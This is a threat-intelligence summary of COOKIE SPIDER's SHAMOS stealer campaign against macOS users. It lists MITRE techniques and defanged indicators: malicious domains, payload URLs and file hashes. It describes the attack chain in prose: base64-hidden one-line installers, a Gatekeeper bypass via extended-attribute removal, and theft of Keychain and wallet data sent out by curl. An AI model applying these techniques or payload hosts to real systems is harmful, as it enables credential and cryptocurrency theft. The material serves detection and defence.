Falcon Platform Prevents COOKIE SPIDER’s SHAMOS Delivery on macOS

Between June and August 2025, COOKIE SPIDER’s SHAMOS (an AMOS variant) was distributed via malvertising and malicious one-line installation commands to target macOS users across many countries, with CrowdStrike Falcon blocking attempts to compromise over 300 customer environments. The campaign used Base64-obfuscated URLs and Bash scripts to bypass Gatekeeper, capture credentials and wallets (including Keychain and AppleNotes), and exfiltrate data; #SHAMOS #COOKIE_SPIDER

Keypoints

CROWDSTRIKE FALCON blocked a campaign from June–August 2025 that attempted to compromise 300+ customer environments by distributing SHAMOS, an Atomic macOS Stealer (AMOS) variant developed by COOKIE SPIDER.
Attackers used malvertising and spoofed help websites (e.g., mac-safer[.]com, rescue-mac[.]com) and malicious one-line Terminal commands to trick macOS users into executing installer Bash scripts.
The one-line commands sometimes used Base64 encoding to hide the download URL and enabled bypassing Gatekeeper by removing extended attributes and directly executing Mach-O binaries from /tmp/.
SHAMOS performs anti-VM checks, runs AppleScript for host reconnaissance, searches for cryptocurrency wallet files and credential stores (Keychain, AppleNotes, browsers), and exfiltrates data via curl in an out.zip archive.
SHAMOS downloads additional payloads (spoofed Ledger Live and a botnet module), sets persistence via com.finder.helper.plist in LaunchDaemons (if Sudo available), and assigns executables in the victim’s home directory.
Threat actors also abused GitHub repositories (e.g., github[.]com/jeryrymoore/Iterm2) to host fake installation instructions and deliver the same one-line command and Bash scripts (macostutorial[.]com hosts identified).
CrowdStrike recommends enabling suspicious process prevention and intelligence-sourced threat prevention and provides Falcon hunting queries to detect Bash scripts with dscl/curl/xattr/chmod, AppleScript execution from /tmp/, and curl POSTs sending out.zip.

MITRE Techniques

[T1583.001 ] Acquire Infrastructure: Domains – The eCrime actor registered fake macOS help websites to host malicious instructions (e.g., “fake macOS help websites” used to host installer commands).
[T1189 ] Drive-by Compromise – Malvertising distributed websites containing SHAMOS installation instructions and lured victims to execute the one-line install command (“promoted malvertising website… users were instructed to execute a malicious one-line installation command”).
[T1204 ] User Execution – SHAMOS requires the user to copy/paste and run the malicious installer command in Terminal to initiate infection (“Both malvertising websites instruct the victims to copy, paste, and execute the following command in Terminal”).
[T1027.010 ] Obfuscated Files or Information: Command Obfuscation – The malicious command uses Base64 encoding to obfuscate the Bash script download URL (“the command decodes the Base64-encoded string… and downloads a file from https[:]//icloudservers[.]com/gm/install[.]sh”).
[T1105 ] Ingress Tool Transfer – The Bash script and subsequent curl commands download SHAMOS and additional payloads from external URLs (“the Bash script… downloads a SHAMOS Mach-O executable from https[:]//icloudservers[.]com/gm/update” and “SHAMOS downloads additional malicious payloads… to the victim’s home directory”).

Indicators of Compromise

[Domains ] Malvertising and hosting – mac-safer[.]com, rescue-mac[.]com (fraudulent macOS help pages that provided malicious install commands).
[Domains ] GitHub and fake repos – github[.]com/jeryrymoore/Iterm2 (malicious repo masquerading as iTerm2 with fake install instructions).
[URLs ] Bash script hosts – https[:]//icloudservers[.]com/gm/install[.]sh, https[:]//macostutorial[.]com/iterm2/install[.]sh (hosts serving installer Bash scripts).
[URLs ] SHAMOS payload hosts – https[:]//icloudservers[.]com/gm/update, https[:]//macostutorial[.]com/iterm2/update (locations from which SHAMOS Mach-O was downloaded).
[File hashes ] Bash script SHA256 – 231c4bf14c4145be77aa4fef36c208891d818983c520ba067dda62d3bbbf547f, eb7ede285aba687661ad13f22f8555aab186debbadf2c116251cb269e913ef68
[File hashes ] SHAMOS Mach-O SHA256 – 4549e2599de3011973fde61052a55e5cdb770348876abc82de14c2d99575790f, b01c13969075974f555c8c88023f9abf891f72865ce07efbcee6c2d906d410d5 (and 2 more hashes).